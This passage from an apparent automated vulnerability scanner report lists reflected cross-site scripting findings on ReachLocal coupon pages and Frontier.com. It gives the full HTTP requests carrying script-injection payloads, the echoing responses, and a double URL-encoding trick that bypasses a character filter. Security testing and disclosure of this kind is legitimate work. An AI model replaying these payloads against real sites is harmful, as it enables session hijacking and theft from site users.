GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
ass="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup(
...[SNIP]...

2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d338"><script>alert(1)</script>ad1ca6e1bfb was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=23329
...[SNIP]...

2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56381"><script>alert(1)</script>70d89b3bb75 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:49 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...

2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4a6"><script>alert(1)</script>d1455ccc13a was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:01 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
2&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary
...[SNIP]...

2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d28"><script>alert(1)</script>56378b08b00 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...

2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309b3"><script>alert(1)</script>4eadda684d was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3261
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971
...[SNIP]...

2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b54e"><script>alert(1)</script>9fb0f72f32a was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:47 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...

2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a54%2527%253balert%25281%2529%252f%252f24407793c50 was submitted in the REST URL parameter 1. This input was echoed as 59a54';alert(1)//24407793c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering59a54%2527%253balert%25281%2529%252f%252f24407793c50/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering59a54';alert(1)//24407793c50/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...

2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3 was submitted in the REST URL parameter 2. This input was echoed as 760b6';alert(1)//951f3ddd7d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo760b6';alert(1)//951f3ddd7d3/tabs.css');//]]>
...[SNIP]...

2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 was submitted in the REST URL parameter 3. This input was echoed as aeffb';alert(1)//9b1214b2e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.cssaeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
